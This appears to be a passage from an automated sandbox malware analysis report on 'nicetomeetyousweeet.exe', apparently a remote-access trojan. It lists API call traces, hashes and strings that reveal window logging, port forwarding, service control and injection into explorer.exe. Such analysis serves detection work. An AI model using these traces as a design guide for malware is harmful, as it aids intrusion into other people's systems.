• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
APIs
• __EH_prolog.LIBCMT ref: 00799394
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00799452
• Sleep.KERNEL32(000003E8), ref: 007994D4
• GetLocalTime.KERNEL32(?), ref: 007994E3
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 007995CC
Strings
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: Sleep$CreateDirectoryH_prologLocalTime
• String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
• API String ID: 3069631530-65789007
APIs
• __Init_thread_footer.LIBCMT ref: 0040A456
• Sleep.KERNEL32(000001F4), ref: 0040A461
• GetForegroundWindow.USER32 ref: 0040A467
• GetWindowTextLengthW.USER32(00000000), ref: 0040A470
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
• Sleep.KERNEL32(000003E8), ref: 0040A574
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
Strings
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
• GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
• __dosmaperr.LIBCMT ref: 004393CD
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
• GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
• __dosmaperr.LIBCMT ref: 0043940A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
• GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
• __dosmaperr.LIBCMT ref: 0043945E
• _free.LIBCMT ref: 0043946A
• _free.LIBCMT ref: 00439471
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Yara matches
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B9620
                                                                                • GetLastError.KERNEL32(?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B962D
                                                                                • __dosmaperr.LIBCMT ref: 007B9634
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B9660
                                                                                • GetLastError.KERNEL32(?,?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B966A
                                                                                • __dosmaperr.LIBCMT ref: 007B9671
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00465290,00000000,00000000,?,?,?,?,?,?,00781D3F,?), ref: 007B96B4
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00781D3F,?,00000050,00465290,00000000), ref: 007B96BE
                                                                                • __dosmaperr.LIBCMT ref: 007B96C5
                                                                                • _free.LIBCMT ref: 007B96D1
                                                                                • _free.LIBCMT ref: 007B96D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                • String ID:
                                                                                • API String ID: 2441525078-0
                                                                                • Opcode ID: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                                                • Instruction ID: 30cb7fc9e44e17720b8967cc2325d5517ec926d587c529ec32c97b37728cb408
                                                                                • Opcode Fuzzy Hash: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                                                • Instruction Fuzzy Hash: FF318F7190420AFFDF116FA4DC89EEE3B69EF05364F14016DFA2056151DA39CD60DB61
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                • API String ID: 0-3177665633
                                                                                • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                • Instruction ID: 52e341c48b4ffddb3c17eb599c86bff58966bdcc2375319b8305983b155aef2d
                                                                                • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                • Instruction Fuzzy Hash: 8861C2715C9302EED700FF20E856AAA77A4BF96711F44488DF581572E2DF789A08C7A3
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                • TranslateMessage.USER32(?), ref: 00404F30
                                                                                • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                • API String ID: 2956720200-749203953
                                                                                • Opcode ID: 0809b1d592a5ed40a960ac11efc5650e3cf0d4be032a537647f691e6faedb08b
                                                                                • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                • Opcode Fuzzy Hash: 0809b1d592a5ed40a960ac11efc5650e3cf0d4be032a537647f691e6faedb08b
                                                                                • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 007850D8
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00785188
                                                                                • TranslateMessage.USER32(?), ref: 00785197
                                                                                • DispatchMessageA.USER32(?), ref: 007851A2
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 0078525A
                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00785292
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                • API String ID: 2956720200-749203953
                                                                                • Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                                • Instruction ID: 7154f5c338634d5d248e39f223f1a50a8636c29531187d5212b31151634b792a
                                                                                • Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                                • Instruction Fuzzy Hash: 7041D671A44700ABCB14FB78DC5E86E77E9AF85710F40092CF906831A6EF38DA06C752
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                • String ID: <$@$@FG$@FG$Temp
                                                                                • API String ID: 1107811701-2245803885
                                                                                • Opcode ID: c712177a3fcf14296a48420873d718a02d4786eed49f0f7e6af701ac92b2a7af
                                                                                • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                • Opcode Fuzzy Hash: c712177a3fcf14296a48420873d718a02d4786eed49f0f7e6af701ac92b2a7af
                                                                                • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0079718B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00797194
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 007971A3
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00797157
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                • String ID: <$@$@FG$@FG$TUF
                                                                                • API String ID: 1107811701-3315534519
                                                                                • Opcode ID: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
                                                                                • Instruction ID: e4059ca407b659d5466cab192f7b27a29569c70b1dd5fb8816a395c6b6f38416
                                                                                • Opcode Fuzzy Hash: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
                                                                                • Instruction Fuzzy Hash: 15319E31E80209DBCF18FBA4DC5EAEE7735AF40311F104169F506660E2EF785A8ACB91
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe), ref: 00406705
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcess
                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                • API String ID: 2050909247-4145329354
                                                                                • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 2c3f92f457844e41ff86450acd5aff28f03427e63226fad44709e0019a985647
                                                                                • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                • Opcode Fuzzy Hash: 2c3f92f457844e41ff86450acd5aff28f03427e63226fad44709e0019a985647
                                                                                • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00446DDF
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 00446DEB
                                                                                • _free.LIBCMT ref: 00446DF6
                                                                                • _free.LIBCMT ref: 00446E01
                                                                                • _free.LIBCMT ref: 00446E0C
                                                                                • _free.LIBCMT ref: 00446E17
                                                                                • _free.LIBCMT ref: 00446E22
                                                                                • _free.LIBCMT ref: 00446E2D
                                                                                • _free.LIBCMT ref: 00446E38
                                                                                • _free.LIBCMT ref: 00446E46
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                APIs
                                                                                • _free.LIBCMT ref: 007C7046
                                                                                  • Part of subcall function 007C6D2C: HeapFree.KERNEL32(00000000,00000000,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?), ref: 007C6D42
                                                                                  • Part of subcall function 007C6D2C: GetLastError.KERNEL32(?,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?,?), ref: 007C6D54
                                                                                • _free.LIBCMT ref: 007C7052
                                                                                • _free.LIBCMT ref: 007C705D
                                                                                • _free.LIBCMT ref: 007C7068
                                                                                • _free.LIBCMT ref: 007C7073
                                                                                • _free.LIBCMT ref: 007C707E
                                                                                • _free.LIBCMT ref: 007C7089
                                                                                • _free.LIBCMT ref: 007C7094
                                                                                • _free.LIBCMT ref: 007C709F
                                                                                • _free.LIBCMT ref: 007C70AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                • Instruction ID: f1774bd9c448a454d5dbac9f49b1670e448fe3c27b450c84ff0c5e5e14f71ad4
                                                                                • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                • Instruction Fuzzy Hash: 35115376600108EFCF45EF64E886E993F76AF04350B5150A9B9098B122DA36EE50DB84
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00791F01
                                                                                  • Part of subcall function 0079AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00783CA7), ref: 0079ADC6
                                                                                  • Part of subcall function 0079791D: CloseHandle.KERNEL32( =x$SF,?,?,00783D20,00465324), ref: 00797933
                                                                                  • Part of subcall function 0079791D: CloseHandle.KERNEL32(?,?,?,00783D20,00465324), ref: 0079793C
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 007921F8
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0079222F
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 0079226B
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                • String ID: HDG$HDG$>G$>G
                                                                                • API String ID: 1937857116-1666402509
                                                                                • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                • Instruction ID: 79fc5256e1c7ea99c901f9afdb27c3b3338215013eee592eed00e3daddb95b8e
                                                                                • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                • Instruction Fuzzy Hash: 6A02443168C340DEC729FB24D869BEEB3D5AF94301F50482DF58A86193EE785A4BC752
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Eventinet_ntoa
                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                • API String ID: 3578746661-4192532303
                                                                                • Opcode ID: 93c84ebb9a645676f6df3c0e1a8f241db98c5f09e9be4a3df439d358246397e7
                                                                                • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                • Opcode Fuzzy Hash: 93c84ebb9a645676f6df3c0e1a8f241db98c5f09e9be4a3df439d358246397e7
                                                                                • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Eventinet_ntoa
                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                • API String ID: 3578746661-4192532303
                                                                                • Opcode ID: a0049f2f09a357c7da3f2da1302c44ceee5b7892c88a4f25036bd0ddf1a9f3a7
                                                                                • Instruction ID: 4b94e649ba30769429e3fc1096c739f67d765c573cc7de391c790fe0cff880b3
                                                                                • Opcode Fuzzy Hash: a0049f2f09a357c7da3f2da1302c44ceee5b7892c88a4f25036bd0ddf1a9f3a7
                                                                                • Instruction Fuzzy Hash: F151A631A542009FCB14F778E95E66E76A5AB81310F404529F506872E2EF3CAE46CBD6
                                                                                APIs
                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0079A519
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0079A555
                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 0079A566
                                                                                • SetEvent.KERNEL32 ref: 0079A5F1
                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0079A602
                                                                                • CloseHandle.KERNEL32 ref: 0079A612
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                                                                                • String ID: TUF$open "
                                                                                • API String ID: 1811012380-2979349893
                                                                                • Opcode ID: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
                                                                                • Instruction ID: 1d3a0e6bfc5d9dde327b5f549d13de2f1c54c7be39c984fe613b4fde38d6e755
                                                                                • Opcode Fuzzy Hash: afa000e900512d794b59872f8fe6b6e7421b33da501b9bd85e28326864c8fc87
                                                                                • Instruction Fuzzy Hash: 2D51B171244305BED614BB24EC8AEBF3B5CDB81755F10002AF045921A2EE699D49C7A7
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0078A6BD
                                                                                • Sleep.KERNEL32(000001F4), ref: 0078A6C8
                                                                                • GetForegroundWindow.USER32 ref: 0078A6CE
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0078A6D7
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0078A70B
                                                                                • Sleep.KERNEL32(000003E8), ref: 0078A7DB
                                                                                  • Part of subcall function 00789FBF: SetEvent.KERNEL32(00000000,?,00000000,0078AB83,00000000), ref: 00789FEB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                • String ID: [${ User has been idle for
                                                                                • API String ID: 911427763-3934435721
                                                                                • Opcode ID: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
                                                                                • Instruction ID: 369146a281ae15b4e75bc2685a2892f1449d179550295cfc96995b0b3a0d0242
                                                                                • Opcode Fuzzy Hash: 6d776f70f920023e5288755160ba8f24f5da9fa6db96a00e1421ea32c0579234
                                                                                • Instruction Fuzzy Hash: 2551E431688600EBD714FB30D84EB6EB3A5AB84710F54052EF446861D2EF6C9A46C797
                                                                                APIs
                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DecodePointer
                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                • API String ID: 3527080286-3064271455
                                                                                • Opcode ID: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                                • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                • Opcode Fuzzy Hash: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                                • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                APIs
                                                                                • ExitThread.KERNEL32 ref: 004017F4
                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
